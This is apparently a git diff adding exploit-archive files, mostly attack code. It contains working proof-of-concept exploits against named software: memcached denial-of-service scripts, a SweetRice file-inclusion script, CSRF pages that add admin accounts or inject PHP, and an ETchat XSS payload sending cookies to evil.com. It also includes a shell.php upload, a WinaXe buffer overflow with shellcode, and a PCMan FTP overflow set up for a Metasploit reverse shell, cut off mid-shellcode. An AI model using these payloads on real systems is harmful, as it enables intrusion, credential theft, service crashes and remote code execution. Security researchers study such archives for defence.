40701,platforms/php/webapps/40701.html,"ETchat 3.7 - Cross-Site Request Forgery",2016-11-03,"Hesam Bazvand",php,webapps,0
|
||||
40705,platforms/php/webapps/40705.html,"sNews 1.7.1 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
|
||||
40706,platforms/php/webapps/40706.txt,"sNews 1.7.1 - Arbitrary File Upload",2016-11-03,Amir.ght,php,webapps,0
|
||||
40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0
|
||||
40707,platforms/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
|
||||
40708,platforms/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
45
platforms/linux/dos/40695.c
Executable file
45
platforms/linux/dos/40695.c
Executable file
|
@ -0,0 +1,45 @@
|
|||
# Source: http://paper.seebug.org/95/
|
||||
|
||||
import struct
|
||||
import socket
|
||||
import sys
|
||||
|
||||
MEMCACHED_REQUEST_MAGIC = "\x80"
|
||||
OPCODE_PREPEND_Q = "\x1a"
|
||||
key_len = struct.pack("!H",0xfa)
|
||||
extra_len = "\x00"
|
||||
data_type = "\x00"
|
||||
vbucket = "\x00\x00"
|
||||
body_len = struct.pack("!I",0)
|
||||
opaque = struct.pack("!I",0)
|
||||
CAS = struct.pack("!Q",0)
|
||||
body = "A"*1024
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print "./poc_crash.py <server> <port>"
|
||||
|
||||
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len
|
||||
packet += data_type + vbucket + body_len + opaque + CAS
|
||||
packet += body
|
||||
|
||||
set_packet = "set testkey 0 60 4\r\ntest\r\n"
|
||||
get_packet = "get testkey\r\n"
|
||||
|
||||
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s1.connect((sys.argv[1],int(sys.argv[2])))
|
||||
s1.sendall(set_packet)
|
||||
print s1.recv(1024)
|
||||
s1.close()
|
||||
|
||||
|
||||
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s2.connect((sys.argv[1],int(sys.argv[2])))
|
||||
s2.sendall(packet)
|
||||
print s2.recv(1024)
|
||||
s2.close()
|
||||
|
||||
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s3.connect((sys.argv[1],int(sys.argv[2])))
|
||||
s3.sendall(get_packet)
|
||||
s3.recv(1024)
|
||||
s3.close()
|
30
platforms/linux/dos/40696.c
Executable file
30
platforms/linux/dos/40696.c
Executable file
|
@ -0,0 +1,30 @@
|
|||
# Source: http://paper.seebug.org/95/
|
||||
|
||||
import struct
|
||||
import socket
|
||||
import sys
|
||||
|
||||
|
||||
MEMCACHED_REQUEST_MAGIC = "\x80"
|
||||
OPCODE_ADD = "\x02"
|
||||
key_len = struct.pack("!H",0xfa)
|
||||
extra_len = "\x08"
|
||||
data_type = "\x00"
|
||||
vbucket = "\x00\x00"
|
||||
body_len = struct.pack("!I",0xffffffd0)
|
||||
opaque = struct.pack("!I",0)
|
||||
CAS = struct.pack("!Q",0)
|
||||
extras_flags = 0xdeadbeef
|
||||
extras_expiry = struct.pack("!I",0xe10)
|
||||
body = "A"*1024
|
||||
|
||||
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len
|
||||
packet += data_type + vbucket + body_len + opaque + CAS
|
||||
packet += body
|
||||
if len(sys.argv) != 3:
|
||||
print "./poc_add.py <server> <port>"
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((sys.argv[1],int(sys.argv[2])))
|
||||
s.sendall(packet)
|
||||
print s.recv(1024)
|
||||
s.close()
|
19
platforms/linux/dos/40697.c
Executable file
19
platforms/linux/dos/40697.c
Executable file
|
@ -0,0 +1,19 @@
|
|||
# Source: http://paper.seebug.org/95/
|
||||
|
||||
import struct
|
||||
import socket
|
||||
import sys
|
||||
|
||||
|
||||
MEMCACHED_REQUEST_MAGIC = "\x80"
|
||||
OPCODE_SET = "\x21"
|
||||
key_len = struct.pack("!H",32)
|
||||
body_len = struct.pack("!I",1)
|
||||
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + "A"*1000
|
||||
if len(sys.argv) != 3:
|
||||
print "./poc_sasl.py <server> <ip>"
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((sys.argv[1],int(sys.argv[2])))
|
||||
s.sendall(packet)
|
||||
print s.recv(1024)
|
||||
s.close()
|
|
@ -1,11 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/54670/info
|
||||
|
||||
REDAXO is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
REDAXO 4.4 is vulnerable; prior versions may also be affected.
|
||||
|
||||
http://www.example.com/redaxo/index.php?page=user&subpage=%22%3 %3Cscript%3Ealert%28document.cookie%29;%3C/sc ript%3E
|
||||
|
||||
http://www.example.com/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E
|
74
platforms/php/webapps/40698.py
Executable file
74
platforms/php/webapps/40698.py
Executable file
|
@ -0,0 +1,74 @@
|
|||
#/usr/bin/python
|
||||
#-*- Coding: utf-8 -*-
|
||||
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion
|
||||
# Exploit Author: Ashiyane Digital Security Team
|
||||
# Date: 03-11-2016
|
||||
# Vendor: http://www.basic-cms.org/
|
||||
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
|
||||
# Version: 1.5.1
|
||||
# Platform: WebApp - PHP - Mysql
|
||||
|
||||
import requests
|
||||
import os
|
||||
from requests import session
|
||||
|
||||
if os.name == 'nt':
|
||||
os.system('cls')
|
||||
else:
|
||||
os.system('clear')
|
||||
pass
|
||||
banner = '''
|
||||
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|
||||
| _________ __ __________.__ |
|
||||
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
|
||||
| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
|
||||
| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
|
||||
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
|
||||
| \/ \/ \/ \/ \/ \/ |
|
||||
| > SweetRice 1.5.1 Local File Inclusion |
|
||||
| > Script Cod3r : Ehsan Hosseini |
|
||||
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|
||||
'''
|
||||
|
||||
print(banner)
|
||||
|
||||
|
||||
# Get Host & User & Pass & LfiPath
|
||||
host = input("Enter The Target URL(Example : localhost.com) : ")
|
||||
username = input("Enter Username : ")
|
||||
password = input("Enter Password : ")
|
||||
lfipath = input("Enter File To Download(Example : ../db.php) : ")
|
||||
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")
|
||||
|
||||
userinfo = {
|
||||
'user':username,
|
||||
'passwd':password,
|
||||
'rememberMe':''
|
||||
}
|
||||
|
||||
with session() as r:
|
||||
login = r.post('http://' + host + '/as/?type=signin', data=userinfo)
|
||||
success = 'Login success'
|
||||
if login.status_code == 200:
|
||||
print("[+] Sending User&Pass...")
|
||||
if login.text.find(success) > 1:
|
||||
print("[+] Login Succssfully...")
|
||||
else:
|
||||
print("[-] User or Pass is incorrent...")
|
||||
print("Good Bye...")
|
||||
exit()
|
||||
pass
|
||||
pass
|
||||
dlfile = r.get('http://' + host + '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')
|
||||
|
||||
if dlfile.status_code == 200:
|
||||
|
||||
print('[+] Exploit...')
|
||||
file = open(xplfile, "w")
|
||||
file.write(dlfile.text)
|
||||
file.close()
|
||||
print('[+] File Saved...')
|
||||
print('[+] Exploit By Ehsan Hosseini')
|
||||
else:
|
||||
print("[-] Error in Exploting...")
|
||||
pass
|
39
platforms/php/webapps/40700.html
Executable file
39
platforms/php/webapps/40700.html
Executable file
|
@ -0,0 +1,39 @@
|
|||
<!--
|
||||
# Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution
|
||||
# Date: 30-11-2016
|
||||
# Exploit Author: Ashiyane Digital Security Team
|
||||
# Vendor Homepage: http://www.basic-cms.org/
|
||||
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
|
||||
# Version: 1.5.1
|
||||
|
||||
|
||||
# Description :
|
||||
|
||||
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
|
||||
PHP Codes In Ads File
|
||||
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
|
||||
PHP Codes On Server .
|
||||
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; phpinfo();
|
||||
Code You Can
|
||||
Customize Exploit For Your Self .
|
||||
|
||||
# Exploit :
|
||||
-->
|
||||
|
||||
<html>
|
||||
<body onload="document.exploit.submit();">
|
||||
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
|
||||
<input type="hidden" name="adk" value="hacked"/>
|
||||
<textarea type="hidden" name="adv">
|
||||
<?php
|
||||
echo '<h1> Hacked </h1>';
|
||||
phpinfo();?>
|
||||
</textarea>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
# After HTML File Executed You Can Access Page In
|
||||
http://localhost/sweetrice/inc/ads/hacked.php
|
||||
-->
|
41
platforms/php/webapps/40701.html
Executable file
41
platforms/php/webapps/40701.html
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: ETchat(persian version) CMS Xsrf vulnerability
|
||||
# Exploit Author: Hesam Bazvand
|
||||
# Contact: https://www.facebook.com/hesam.king73
|
||||
# Software Link: http://dl.20script.ir/script/chat/et-chat-3.7-Persian(www.20script.ir).zip
|
||||
# Tested on: Windows 7 / Kali Linux
|
||||
# Category: WebApps
|
||||
# Dork : User Your Mind ! :D
|
||||
# Email : Black.king066@gmail.com
|
||||
#special thanks to my best friend Aryan Bayani Nejad
|
||||
|
||||
<html>
|
||||
<body onload="document.frm1.submit()" >
|
||||
|
||||
<script>
|
||||
var f = document.createElement("form");
|
||||
f.setAttribute('method',"post");
|
||||
f.setAttribute('name',"frm1");
|
||||
f.setAttribute('action',"http://localhost/etchat/?AdminCreateNewRoom");
|
||||
|
||||
var i = document.createElement("input"); //input element, text
|
||||
i.setAttribute('type',"text");
|
||||
i.setAttribute('name',"room");
|
||||
i.setAttribute('value',"<ScRiPt \>window.location.replace(\"http://evil.com\" + encodeURIComponent(document.cookie))\</ScRiPt\>");
|
||||
|
||||
|
||||
|
||||
f.appendChild(i);
|
||||
|
||||
|
||||
//and some more input elements here
|
||||
//and dont forget to add a submit button
|
||||
|
||||
document.getElementsByTagName('body')[0].appendChild(f);
|
||||
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
</body>
|
||||
</html>
|
27
platforms/php/webapps/40705.html
Executable file
27
platforms/php/webapps/40705.html
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title : Snews CMS Cross Site Request Forgery
|
||||
# Author : Ashiyane Digital Security Team
|
||||
# Google Dork : "This site is powered by sNews"
|
||||
# Date : 1/11/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://snewscms.com/
|
||||
# Software link : http://snewscms.com/download/snews1.7.1.zip
|
||||
# Version : 1.7(latest)
|
||||
#######################################################3
|
||||
Change Username and Password of admin
|
||||
We Dont need old user name and old password
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form name="form0" action="http://localhost/?action=process&task=changeup" method="POST">
|
||||
<input type="hidden" name="uname" value="Attacker" /> // new username
|
||||
<input type="hidden" name="pass1" value="Attacker" /> //new password
|
||||
<input type="hidden" name="pass2" value="Atacker" />// repeat new password
|
||||
<input type="hidden" name="task" value="changeup" />
|
||||
<input type="submit" name="submit_pass" value="Save" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
####################################################
|
||||
######### exploit by: Amir.ght #####################
|
||||
####################################################
|
58
platforms/php/webapps/40706.txt
Executable file
58
platforms/php/webapps/40706.txt
Executable file
|
@ -0,0 +1,58 @@
|
|||
# Exploit Title : Snews CMS upload sheller
|
||||
# Author : Ashiyane Digital Security Team
|
||||
# Google Dork : "This site is powered by sNews"
|
||||
# Date : 04/11/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://snewscms.com/
|
||||
# Software link : http://snewscms.com/download/snews1.7.1.zip
|
||||
# Version : 1.7(latest)
|
||||
#######################################################3
|
||||
need admin access for upload files but we can upload any file without
|
||||
bypass(.php,.exe,....)
|
||||
1-goto http://SiteName/snews_files/
|
||||
2- click on Browse botton and select you`re file
|
||||
3- click on upload
|
||||
sheller path is :
|
||||
http://SiteName/shell.php
|
||||
|
||||
poc url:
|
||||
http://localhost/snews_files/
|
||||
|
||||
Poc header:
|
||||
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/snews_files/
|
||||
Cookie: PHPSESSID=am9ffv1sg2kjkfnaku69tfgsu5
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: multipart/form-data;
|
||||
boundary=---------------------------92741037415004
|
||||
Content-Length: 665
|
||||
|
||||
-----------------------------92741037415004\r\n
|
||||
Content-Disposition: form-data; name="upload_dir"\r\n
|
||||
\r\n
|
||||
.\r\n
|
||||
-----------------------------92741037415004\r\n
|
||||
Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n
|
||||
Content-Type: application/\r\n
|
||||
\r\n
|
||||
<?php phpinfo ?><br>\r\n
|
||||
-----------------------------92741037415004\r\n
|
||||
Content-Disposition: form-data; name="ip"\r\n
|
||||
\r\n
|
||||
127.0.0.1\r\n
|
||||
-----------------------------92741037415004\r\n
|
||||
Content-Disposition: form-data; name="time"\r\n
|
||||
\r\n
|
||||
1478199661\r\n
|
||||
-----------------------------92741037415004\r\n
|
||||
Content-Disposition: form-data; name="upload"\r\n
|
||||
\r\n
|
||||
Upload\r\n
|
||||
-----------------------------92741037415004--\r\n
|
42
platforms/php/webapps/40707.html
Executable file
42
platforms/php/webapps/40707.html
Executable file
|
@ -0,0 +1,42 @@
|
|||
# Exploit Title : nodcms Cross Site Request Forgery
|
||||
# Author : Ashiyane Digital Security Team
|
||||
# Google Dork : -
|
||||
# Date : 29/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.nodcms.com/en
|
||||
Software link :
|
||||
https://github.com/khodakhah/nodcms/archive/master.zip
|
||||
|
||||
|
||||
|
||||
########################### CSRF PoC ###############################
|
||||
# create User: username=Attacker & password=123456
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form name="form0" action="http://SiteName/admin/user_manipulate" method="POST">
|
||||
<input type="hidden" name="data[username]" value="Attacker" />
|
||||
<input type="hidden" name="data[email]" value="Attacker@attacker.com" />
|
||||
<input type="hidden" name="data[fullname]" value="Atacker" />
|
||||
<input type="hidden" name="data[password]" value="123456" />
|
||||
<input type="hidden" name="data[status]" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
####################################################################
|
||||
# CSRF/Xss
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form name="form1" action="http://sitename/admin/settings/generall" method="POST">
|
||||
<input type="hidden" name="data[language_id]" value="1" />
|
||||
<input type="hidden" name="data[company]" value="<script>alert(/xss/)</script>" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
####################################################################
|
||||
#-# Discovered by : Amir.ght
|
36
platforms/php/webapps/40708.html
Executable file
36
platforms/php/webapps/40708.html
Executable file
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title : redaxo CMS CSRF(Add Admin)
|
||||
# Author : Ashiyane Digital Security Team
|
||||
# Google Dork : intitle:Login · REDAXO
|
||||
# Date : 1/11/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.redaxo.org/
|
||||
# Software link :http://www.redaxo.org/de/download/file/?f=redaxo_5.2.0.zip
|
||||
# Version : 5.2(latest)
|
||||
#######################################################3
|
||||
admin user : Attacker
|
||||
admin password : 123456
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form name="form0" action="http://localhost/redaxo_5.2.0/redaxo/index.php?page=users/users" method="POST">
|
||||
<input type="hidden" name="userlogin" value="Attacker" /> // username
|
||||
<input type="hidden" name="username" value="Attacker" />
|
||||
<input type="hidden" name="userdesc" value="Atacker" />
|
||||
<input type="hidden" name="useremail" value="hhhhh@hhh.com" />// email
|
||||
<input type="hidden" name="useradmin" value="1" />
|
||||
<input type="hidden" name="userstatus" value="1" />
|
||||
<input type="hidden" name="userperm_be_sprache" value="en_gb" />
|
||||
<input type="hidden" name="userpsw" value="7c4a8d09ca3762af61e59520943dc26494f8941b" /> //123456
|
||||
<input type="hidden" name="function" value="1" />
|
||||
<input type="hidden" name="FUNC_ADD" value="1" />
|
||||
<input type="hidden" name="save" value="1" />
|
||||
<input type="hidden" name="javascript" value="1" />
|
||||
<input type="submit" name="submit_pass" value="Save" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
####################################################
|
||||
######### exploit by: Amir.ght #####################
|
||||
####################################################
|
85
platforms/windows/dos/40699.txt
Executable file
85
platforms/windows/dos/40699.txt
Executable file
|
@ -0,0 +1,85 @@
|
|||
[+] Credits: John Page aka hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt
|
||||
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
============
|
||||
www.labf.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
=============
|
||||
Axessh 4.2.2
|
||||
|
||||
Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without
|
||||
sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold
|
||||
anywhere in the world (apart from places where people aren't allowed to own cryptographic software).
|
||||
|
||||
2. Axessh features include:
|
||||
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
|
||||
Compatible with SSH protocol version 1.5
|
||||
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
|
||||
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
|
||||
Authentication using password
|
||||
Authentication RSA
|
||||
Compression support
|
||||
Connection forwarding, including full support for X-protocol connection forwarding
|
||||
"Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
====================
|
||||
Denial Of Service
|
||||
|
||||
AxeSSH will crash after receiving a overly long payload of junk...
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
1) Open the settings window for axessh and choose Run then click Run as EXE, this will launch "xwpsshd.exe"
|
||||
crashes with bad protocol version.
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"
|
||||
|
||||
ip = raw_input("[IP]> ")
|
||||
port = 22
|
||||
payload="A"*2000
|
||||
s=socket.create_connection((ip,port))
|
||||
s.send(payload)
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
hyp3rlinx
|
112
platforms/windows/remote/40693.py
Executable file
112
platforms/windows/remote/40693.py
Executable file
|
@ -0,0 +1,112 @@
|
|||
[+] Credits: John Page aka hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt
|
||||
|
||||
[+] ISR: Apparition Security
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
============
|
||||
www.labf.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
================
|
||||
WinaXe v7.7 FTP
|
||||
|
||||
The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built and provided in the package.
|
||||
All that you need to run remote UNIX and X Applications is included within WinaXe Plus. You operate simultaneously with
|
||||
X11, FTP and Telnet sessions and with your familiar MS Windows applications.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=======================
|
||||
Remote Buffer Overflow
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
======================
|
||||
|
||||
WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors when connecting to a malicious FTP Server and
|
||||
receiving overly long payloads in the command response from the remote server.
|
||||
|
||||
220 SERVICE READY
|
||||
331 USER / PASS
|
||||
200 TYPE
|
||||
257 PWD
|
||||
|
||||
etc...
|
||||
|
||||
below is POC for "server ready" 220 command exploit when first connecting to a FTP server.
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
import socket,struct
|
||||
|
||||
#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
|
||||
#Discovery hyp3rlinx
|
||||
#ISR: ApparitionSec
|
||||
#hyp3rlinx.altervista.org
|
||||
|
||||
|
||||
#shellcode to pop calc.exe Windows 7 SP1
|
||||
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
|
||||
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
|
||||
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
|
||||
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
|
||||
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
|
||||
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
|
||||
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
|
||||
|
||||
|
||||
eip=struct.pack('<L',0x68084A6F) #POP ECX RET
|
||||
jmpesp=struct.pack('<L',0x68017296) #JMP ESP
|
||||
|
||||
#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
|
||||
|
||||
payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit
|
||||
|
||||
port = 21
|
||||
s = socket.socket()
|
||||
host = '127.0.0.1'
|
||||
s.bind((host, port))
|
||||
s.listen(5)
|
||||
|
||||
print 'Evil FTPServer listening...'
|
||||
|
||||
while True:
|
||||
conn, addr = s.accept()
|
||||
conn.send('220'+payload+'\r\n')
|
||||
conn.close()
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
89
platforms/windows/remote/40694.txt
Executable file
89
platforms/windows/remote/40694.txt
Executable file
|
@ -0,0 +1,89 @@
|
|||
[+] Credits: John Page aka hyp3rlinx
|
||||
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt
|
||||
|
||||
[+] ISR: Apparition Security
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
======================
|
||||
www.rapidphpeditor.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===============================
|
||||
Rapid PHP Editor IDE
|
||||
rapidphp2016.exe v14.1
|
||||
|
||||
|
||||
Rapid PHP editor is a faster and more powerful PHP editor for Windows combining features of a fully-packed PHP IDE with
|
||||
the speed of the Notepad. Rapid PHP is the most complete all-in-one software for coding PHP, HTML, CSS, JavaScript and
|
||||
other web development languages with tools for debugging, validating, reusing, navigating and formatting your code.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=============================
|
||||
CSRF Remote Command Execution
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
There is a Remote Command Execution ailment in this IDE, if a user of this IDE is running the internal debug server
|
||||
listening on localhost port 89 and they open a link or visit a malicious webpage then remote attackers can execute arbitrary
|
||||
commands on the victims system.
|
||||
|
||||
Reference:
|
||||
http://forums.blumentals.net/viewtopic.php?f=15&t=7062
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
================
|
||||
|
||||
Call Windows "calc.exe" as POC
|
||||
|
||||
<a href="http://127.0.0.1:89/~C/Windows/system32/calc.exe">Click it!</a>
|
||||
|
||||
OR
|
||||
|
||||
<form action="http://127.0.0.1:89/~C/Windows/system32/calc.exe" method="post">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================================
|
||||
Vendor notification: October 5, 2016
|
||||
Vendor confirms vulnerability: October 7, 2016
|
||||
Vendor releases fixed version: November 1, 2016
|
||||
November 2, 2016 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
61
platforms/windows/remote/40704.py
Executable file
61
platforms/windows/remote/40704.py
Executable file
|
@ -0,0 +1,61 @@
|
|||
#!/usr/bin/env python
|
||||
#-*- coding: utf-8 -*-
|
||||
|
||||
# Exploit Title: PCMan FTP Server 2.0 ACCT Command Buffer Overflow Exploit
|
||||
# Date: 3/11/2016
|
||||
# Exploit Author: Cybernetic
|
||||
# Version: 2.0
|
||||
# Tested on: Windows XP Profesional SP3 ESP x86
|
||||
# CVE : N/A
|
||||
|
||||
import socket, os, sys
|
||||
ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7
|
||||
|
||||
#Metasploit Shellcode
|
||||
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
|
||||
|
||||
#nc -lvp 443
|
||||
#Send exploit
|
||||
|
||||
shellcode=("\xba\xac\x84\x20\xa3\xda\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
|
||||
"\x52\x31\x57\x12\x83\xc7\x04\x03\xfb\x8a\xc2\x56\xff\x7b\x80"
|
||||
"\x99\xff\x7b\xe5\x10\x1a\x4a\x25\x46\x6f\xfd\x95\x0c\x3d\xf2"
|
||||
"\x5e\x40\xd5\x81\x13\x4d\xda\x22\x99\xab\xd5\xb3\xb2\x88\x74"
|
||||
"\x30\xc9\xdc\x56\x09\x02\x11\x97\x4e\x7f\xd8\xc5\x07\x0b\x4f"
|
||||
"\xf9\x2c\x41\x4c\x72\x7e\x47\xd4\x67\x37\x66\xf5\x36\x43\x31"
|
||||
"\xd5\xb9\x80\x49\x5c\xa1\xc5\x74\x16\x5a\x3d\x02\xa9\x8a\x0f"
|
||||
